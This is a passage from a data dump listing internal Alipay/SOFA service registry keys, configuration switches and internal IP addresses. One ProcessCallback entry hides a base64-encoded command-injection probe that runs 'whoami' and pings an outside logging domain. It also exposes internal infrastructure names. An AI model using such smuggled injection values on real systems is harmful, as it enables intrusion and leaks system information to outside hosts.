LT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vegameta.common.service.facade.event.EventMetaCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsign.common.service.facade.account.service.FinsignAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.agentfund.api.AftransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_AIOPS_BIZ_CUSTOM_ALARM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.gfcenter.common.service.facade.ReceiptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custcpt.facade.UserMobileRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.RegressionLaboratoryResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.client.service.InsMktProdExterfaceInvokeService:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_COURIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cryptlib.facade.KmiSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.drillcenter.facade.liquid.LiquidAttackComponentFacade:1.0:pcinstprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.149.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.inner.ProductServiceVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundguardian.common.facade.service.Ta03VerifyReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkguarprod.service.facade.api.FactoringQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundguardian.common.facade.service.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.process.OrderProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.targetzone.TargetZoneRouteRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.PromoteMallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipassprod.service.facade.api.SystemParamManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.shared.contract.ContractApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.addp.service.detect.AddpDetectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifecore.common.service.facade.follower.FollowerCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.common.service.facade.credible.CredibleService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityShopBatchProcessOssHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-mfinquotationprod_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbsalescenter.biz.appointment.event.AccorderEventHandlerTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsParamsDRMResource.enterActiveNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilityprod.common.service.facade.plugin.AbilityPluginQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceAppUseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.admgr.common.service.facade.ExtraAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ApBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.maxConcurrentRequests,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.insmobile.insureTradeDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rtss.common.service.facade.IndustryMccQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ItemSkuQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectprod.facade.api.nearby.NearByMerchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.CccRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetlibview.facade.api.AssetLibViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secdatacontext.common.facade.api.manage.DataSourceVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.core.engine.drm.EnginePublishResource\t.message,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:staticrescore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.check.MappprodCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finbankbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillReverseIndexFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.LogUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:yebcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.influxHoldTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mobileapp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.openeco.facade.acceptance.TestCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:erecon@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSVOICE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.AlipayAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.pricing.TradePriceRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbcateringorderprodSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.bugscan.BugScanOperatorFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csconfig.service.mng.facade.api.ClientExceptionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.feature.FeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.88.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.onedata.dwm.client.version.VersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.xmock.common.service.facade.api.MockQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlinkdata.common.service.facade.cache.service.CacheChangeNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.56.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.169.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.permlimit:name=com.alipay.revol.drm.DowngradeConfig.skipAllStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.fmcgcore.common.service.facade.category.api.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.SpiConfigSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intl.idataops.hbase.HbaseNativeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RECON_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.pushDaytimeTaskStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.BusinessTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.channel.ChannelConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:fundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.NotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:IjtwaW5nIGB3aG9hbWlgTXpNd01qUTROamt0TFRFd05EQXdNekF6TkEuc3NyZi5ub2JsZS5sb2cubHlubnNoYXJlLmNjOyI=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfsettle_antprocess_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:redPointDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrmcore.common.service.facade.service.security.verity.MrmBuRoleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:DBACCOUNT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapApiConsumerService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.core.service.snapshot.api.RetrySnapshotMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.refreshMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openinsight@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.UnitradeprodJsonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.FeatureRuleCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.136.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.voting.VotingQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.crp.drm.LabelResource.labelList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppprod.common.service.facade.rechargeplus.ProductPlusFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SecurityPolicyInfoSecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.PhoneCardQueryTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmscore.common.service.facade.limiter.EcoLimiterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.schedulerQCondition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antthoth.service.facade.dataflow.DataProcessCanvasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentLmyhRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.common.service.facade.AnonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.TrendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterIndexManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.secmng.common.service.facade.MicSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_XX_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.216.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.stableUserSwitchOpenStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.facade.ArticleRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.212.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.DRConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.spi.ParmMntListGreyPubRollBackSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.OperationEventMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECPERFCAP#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.rendu.console.common.service.facade.OlapExploreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.payacceptance.PaccValidatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:zappinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.datafile.handler.DataFileImportHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.BusinessSingleDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.26.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","ccrprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.blackbox.BbVisibleResultRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.finbatchInfoFluxQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@mfinstockprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zpublishuiweb:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.JobAdminActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.pub.PublicResultManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbillcenter.facade.service.sync.UnionCardSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.platform.common.service.facade.iface.FpdecisionFacade:1.0:fpdecisionFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_RPC_TRANSMIT_VEHOWNERPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.depositback.ManualDbackManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.endpoint.facade.SampleRestFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_YW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebillcenter.common.service.facade.EbillUserProfileQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ebpp.EbppFieldTypeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.ValidationSecurityPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:iothub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.user.facade.MauthUserAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:dwalm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-statecouncil@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceRelationMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsFundShareExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:loginxiaowei@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:idocsmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CALENDAR_REMIND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.UsageQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.181.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MESHYCOMMANDER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.checkroute.CheckRouteService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_STATICRESCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.tradeexprod.tradeexprod_history_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardVostroAccountNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstest.ReportingAuthorizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.117.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardPayCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.TransInfoCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.business.mng.TargetLabelTemplateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_HENGSHAN_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openauth.common.service.facade.rpc.AuthManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.personalization.PersonalizedRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.live.LiveOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbmarketcenter.common.service.facade.manager.service.ExchangeProdActivityManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvTitleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.product.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipsponsorprod.biz.cashback.service.facade.CashBackUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ReadMeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.PayEbppBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.grayZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprobe.rule.service.SapinesRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finloancore.p2p.service.facade.loandemand.api.P2pLoanDemandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbdish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.IdentityCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.profit.ProfitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.union.drm.MerchantUnionParamsDrmResource.crowdSceneCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw3.d4702aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.edeductcenter.common.service.facade.CreateEbppBillCallBack:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.112.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unifiedlimit.facade.manage.GroupRulesConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcbuservice_permission_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:meshyserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ilogin.common.service.facade.api.LoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.syncTableLoadNumForCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.operation.OperRecruitPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:personalCertifyApprovalFinishedCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chargefront.service.facade.api.ChargeFrontAsyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antmember.common.service.facade.growthplus.groupgrowth.CreativeTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mfinbaseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.TriggerTestCaseServi